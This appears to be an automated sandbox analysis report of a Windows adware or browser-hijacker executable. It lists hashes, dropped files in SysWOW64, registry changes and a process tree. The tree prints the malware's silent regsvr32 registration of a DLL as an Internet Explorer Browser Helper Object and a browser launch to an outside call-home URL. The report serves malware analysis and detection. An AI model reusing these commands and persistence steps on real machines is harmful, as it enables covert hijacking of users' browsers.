Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
04/02/2024, 19:42
Behavioral task
behavioral1
Sample
8ffcef8076920d374af454c1f3b406f9.exe
Resource
win7-20231215-en
General
-
Target
8ffcef8076920d374af454c1f3b406f9.exe
-
Size
153KB
-
MD5
8ffcef8076920d374af454c1f3b406f9
-
SHA1
958bceda667365dc5700d75705afb52b34172872
-
SHA256
c18f66b20db148aff2ff1bc3e2b6634cc8f6f6ed6842fa17839ef435a4ec3d84
-
SHA512
67d3121dc1e148af04fafceb101db34f34648ac2907d67888bc57c3334c2ef95fa89a42015b9368b334e9f1e4ad81ffac72b32820a502924f4420a4682e3cc39
-
SSDEEP
3072:QvxetzT1kBMjoQWJQEnUJPIH1TsNyI6SLtA8vIaiM:yI1kCodm6KPuYNyPSLtlqM
Malware Config
Signatures
-
Loads dropped DLL 1 IoCs
pid Process 3000 regsvr32.exe -
resource yara_rule behavioral1/memory/2372-0-0x0000000000400000-0x0000000000470000-memory.dmp upx behavioral1/memory/2372-29-0x0000000000400000-0x0000000000470000-memory.dmp upx -
Installs/modifies Browser Helper Object 2 TTPs 1 IoCs
BHOs are DLL modules which act as plugins for Internet Explorer.
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{BDF6E57E-7330-40CB-8363-D82E9BFF223B} regsvr32.exe -
Drops file in System32 directory 7 IoCs
description ioc Process File created C:\Windows\SysWOW64\eyfwin.dll 8ffcef8076920d374af454c1f3b406f9.exe File created C:\Windows\SysWOW64\p.ico 8ffcef8076920d374af454c1f3b406f9.exe File created C:\Windows\SysWOW64\sf.ico 8ffcef8076920d374af454c1f3b406f9.exe File created C:\Windows\SysWOW64\c.ico 8ffcef8076920d374af454c1f3b406f9.exe File created C:\Windows\SysWOW64\m.ico 8ffcef8076920d374af454c1f3b406f9.exe File created C:\Windows\SysWOW64\m3.ico 8ffcef8076920d374af454c1f3b406f9.exe File created C:\Windows\SysWOW64\s.ico 8ffcef8076920d374af454c1f3b406f9.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\ios.dat 8ffcef8076920d374af454c1f3b406f9.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000566b58630fb3a044b91770fce5e9b2d600000000020000000000106600000001000020000000cf8ac6bc8fa8769604a63ebe93d6118200f697d4b613160c3d89bf1d1645b0c5000000000e800000000200002000000002a985d210547b2a299733e6bd4d08a2e578b4e2741ce20bb519731f5dc4bf4e200000008d1d100079a736e85dd4272e362e24dfdb04ce326048c97092602d77823562ef40000000f0001a849e51b4be2201e502c56ab5160e1c93795a8c443e8b8bd10baa13cc8a6749e9b917dca9f4b1236977c4879d7396b00234a674747928efc5e07fd69182 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90c0c14ea257da01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7A4C9A01-C395-11EE-A5E0-76D8C56D161B} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000566b58630fb3a044b91770fce5e9b2d60000000002000000000010660000000100002000000066013b92cb645b8e58d970bfbda7db65bd4965b830ca5defbbd76f84e188c54c000000000e8000000002000020000000947229e943070f9016e9c5493de4034abc415b6f5b939427438a84e91bf6812690000000f6a7ff823b063452d904926e686099c8917569f62e66faffad948de214f51216d388f2de4ca2a586317d82de2a0e582fb29dca93c8cc1d9a2e575a12b5afd1dd9366e6e81a21d016dad8f53cde30e46caf02f38907ae5269444a8fbc5c96280122edcffde3f27839271d07af015ccf2582a82ba26b19fad9e3a2401e17dbb1199fb91624b739333b7b7c61dd78ac60f240000000840e64bc4167196f79b5e448b4fb28ca82b422956db00ef3617cbf2038d1b37b741e553b8fc769152a03c65038f87b7ebdd454a918192061aa4684e6626e5e48 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "413237593" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe -
Modifies registry class 60 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ = "_Iffgd3cEvents" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\InprocServer32\ = "C:\\Windows\\SysWow64\\eyfwin.dll" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\FLAGS regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1\ = "TrumanBar" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CLSID regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\ = "TrumanBar" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ = "_Iffgd3cEvents" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CurVer\ = "Ho4ydomoj.1" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\InprocServer32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\Version = "1.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1\CLSID\ = "{BDF6E57E-7330-40CB-8363-D82E9BFF223B}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\Programmable regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\Version = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\HELPDIR regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\Version = "1.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CLSID\ = "{BDF6E57E-7330-40CB-8363-D82E9BFF223B}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CurVer regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\ = "ddf457 Library" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\FLAGS\ = "0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ = "Iffgd3c" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\VersionIndependentProgID regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ = "Iffgd3c" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\ProgID regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\HELPDIR\ = "C:\\Windows\\SysWow64\\" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\Version = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1\CLSID regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\ = "TrumanBar" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\ProgID\ = "Ho4ydomoj.1" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0\win32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\VersionIndependentProgID\ = "Ho4ydomoj" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0\win32\ = "C:\\Windows\\SysWow64\\eyfwin.dll" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2780 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2780 iexplore.exe 2780 iexplore.exe 2824 IEXPLORE.EXE 2824 IEXPLORE.EXE 2824 IEXPLORE.EXE 2824 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2372 wrote to memory of 3000 2372 8ffcef8076920d374af454c1f3b406f9.exe 28 PID 2372 wrote to memory of 3000 2372 8ffcef8076920d374af454c1f3b406f9.exe 28 PID 2372 wrote to memory of 3000 2372 8ffcef8076920d374af454c1f3b406f9.exe 28 PID 2372 wrote to memory of 3000 2372 8ffcef8076920d374af454c1f3b406f9.exe 28 PID 2372 wrote to memory of 3000 2372 8ffcef8076920d374af454c1f3b406f9.exe 28 PID 2372 wrote to memory of 3000 2372 8ffcef8076920d374af454c1f3b406f9.exe 28 PID 2372 wrote to memory of 3000 2372 8ffcef8076920d374af454c1f3b406f9.exe 28 PID 2372 wrote to memory of 2780 2372 8ffcef8076920d374af454c1f3b406f9.exe 29 PID 2372 wrote to memory of 2780 2372 8ffcef8076920d374af454c1f3b406f9.exe 29 PID 2372 wrote to memory of 2780 2372 8ffcef8076920d374af454c1f3b406f9.exe 29 PID 2372 wrote to memory of 2780 2372 8ffcef8076920d374af454c1f3b406f9.exe 29 PID 2780 wrote to memory of 2824 2780 iexplore.exe 30 PID 2780 wrote to memory of 2824 2780 iexplore.exe 30 PID 2780 wrote to memory of 2824 2780 iexplore.exe 30 PID 2780 wrote to memory of 2824 2780 iexplore.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe"C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe"1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /s C:\Windows\system32\eyfwin.dll2⤵
- Loads dropped DLL
- Installs/modifies Browser Helper Object
- Modifies registry class
PID:3000
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://configupdatestart.com/bind2.php?id=39138422⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2780 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2824
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD530e4cdc2d137eebcae046057c2733c9b
SHA1600cff8ea458649196055d8cb410b010b8948f27
SHA2560294f464c7aa4b5a882515a9922f7f836d407c809a261743f85fdb319cb0cb82
SHA512abf1ec370543e9b149a25d567a42b60cbd982f5392b7b8f0a102852ea75c297dcb9528ec90fe9d206b2e090719d0c0bbf036dc60826cfe4a5d264df879fec768
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5e459c8be50281da4046a613507d365a6
SHA19eac1bf278cb9a6ee5ee9450af3aa56a13973fbd
SHA2569c9b3993c57f2710594712029d10adb8b3f5a8208a1824f937734cf67f341f63
SHA5127927966bee9705450ca5ccadb91117beb5458e210ae832a29c7a90cef40b6cf5881ee76d494507b9e00d640f189bf3efc18c7a697e328798d05e69f124c8c414
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD58974dafe9683042fb749ef1c95728ad8
SHA1f342973a9fe0bb83d50f5256edeba0cd3fdb1c9c
SHA2569f82fff5e9e551c5f06c23c1c1602538afd772d53b930bb8b57a704ae1021902
SHA512498b15100ad69a9fff85b80bf95cd68a6528916e69ee93d543a94d7cd42615e41a2e25d49054854e3b526ab819aa1b83f063b0da77c026a6d0d0b0c40cdd0700
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5876ab6fd75b174455e3d8ef78e3125cf
SHA14e25c5cbcb6a07889111644261c2097b7746e5ea
SHA256785a61294b47e5f11561bd3399ed8fb457211cb1a7420a9e849773cc8519be17
SHA51210e13a795525cba53f0bef5b5a4cba65ea86d9661c77c7f8ce7f1d8ca4c8e7b7b976815bee29504d6bd9d5e4c7533aa19930c40630df6061d6f4d6841ce38d05
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5f129a7584bfca49ca9d542a5dec1d270
SHA178ad5b9f686911cb83b41977f8b63b9f526ed3b1
SHA2567cb25e74916977abcb0c63ee1f2f53504b32373ec961464f0170f8f617652b3c
SHA5128d36431ae0669ebc016a03adebc4e7bac7ff4f04f43db178c220074893bbbc3effc70ceea82734a58f8162a8bc050ea6baa3edb311a483c64779da7d29a615c3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD56f2c1b0824ace765fe2baefece1fe768
SHA1d4f283e8e7605390023c8e55ae557cc8e836bbff
SHA2565b10db8df1e642bb38294a19da61e0feefc423ceddd3d80290c8578fdb0264ea
SHA512c82f9874bd50ddbb4b73473eb9f63417d024abd9e088554c4e5a0dc4e0a7f07c531fb43d681e7ad1b49d3309fed5ea1023f53f4a5ac4a332084a746ede1a7016
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5f438fcc6a9b10da54c4ced3d64658886
SHA1322b91aef090ab2728f8c06d7a647f5d28716be7
SHA2566a876a12207b0ea806aaaa94d57d9534d7ada7c1b27a94491307eccd539c5113
SHA5122ecd425176e24d645272be0952d6bb967a1d3e7f7875d5c06d15459a46f6928a8d92ca45d410ea520db12d697b7a2c1283034dc052b637e7aa5d6ae9969e138c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD569ec01c27e22686a553e3c94f5394c72
SHA1657383be1ec860a1b2fd59e68b4341d86277cbdf
SHA256d9f33e3e21f1d6da032fc772c3e3f7be2fd7b8bedc07b1debbe058ed7ba00497
SHA512ed4acc5c8769da913b42bfa46975eca30b521aaafe07b8a2a494dfbbaf9db2438b4dd976a1f505c20fca2fb2756985f1f0ef885ff1b1886a5ffac8bd6608fa2a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD53c0e4d35acbd2ef05abd322ecaa5eb15
SHA13531d7f99f710c5126dfbdcbe6473d81bdaa9dce
SHA2567a8d9df8f43910b2411700ef7db64cdb42b55b9c05ef663d6d73060b0d69ad56
SHA51264ac5bca35374326a77f00f6681905a77fdbe8e27578bf85b5d7d99a3a46c590226e502d46bdea96afd0095ff4107af7e2c8e389fe5733d9da1aa3d5f961885b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5367dcef0fe9c67c55f15fa21ad09f6f2
SHA1c2731ce226fc9ee50f3cda95aaadbced646aaf2d
SHA2567df5755d36adc33dc04f354458037a3649dbf82daf028bef17d2119bf2ea28da
SHA51288b74696754baf1d141923fb88e97f1e48fb620c4b643fda598b1d60d9394880dc8bfe1e112d8e61956c1670d264342c5413fd712b2982dc469bd0bb32c04634
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5e789ed7acaf0e3e374abad0065bdecef
SHA1cd69cfa42c3596ff1c587a9ab60c78840ca20d03
SHA256fd2bf820088e8fd91d11b9a6971e1c606d3d5eb9ebb2d2fd8c1cae93ad395e78
SHA512951e218aa89060704b688f9c6f378640262f079c7774c9d11e5ce7b895f886970504aa29649a6f36587a574ae3f1bf4418b3e3acc5b04324e05fca8bd170b531
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD52904ab405bdb5dfa9101408416dda90a
SHA17a135cc0b54d97253249d8305998d049a4d55d77
SHA2563a003280243da33f36001ddd202c7c35ae4ca75ac25aab5876a730be4590f8b5
SHA5127f8d9219d841d6d82c036435e89051425f652bb10b08c9ef9c75cdb24798cf9f6e28bdcc78d3004f8b96721b6958cd92e85a700dc9ec9058e1970ba487c5f686
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD560c27e4ea9787f7c6005e81c87cc6277
SHA1b7fdda940467090d520d1cfdbe56cc704fa293a8
SHA2564a96c801e20ae70ea980f98ca2937637cc2f1175c6d7faa11b97f9de263c2e64
SHA5128ff28c92d8841a3ff87bfca5d2460d4a2c89c8f4bccd2911a645e5df3017e83e008df8b3502922e3356134b5e0ea784a5a87f17c935cbba0c3de0556ea39cce6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5409fc0a781e38a9e0b3a61bc34e95797
SHA11e0dce5555658d89115017d0432818f9e10d8da6
SHA2566e185d3b59a23df9c9abab59059a240f84e5b0ee238a37977a19f92328877905
SHA5124fd486113829c7c9dbd2b7127373c0b7e9b869ba6e1115a9f44ed6f51d8b963bbb7cc1af930c0fb586c98d731e1c268a128e1a124e76f009c36e90d245c6dec2
-
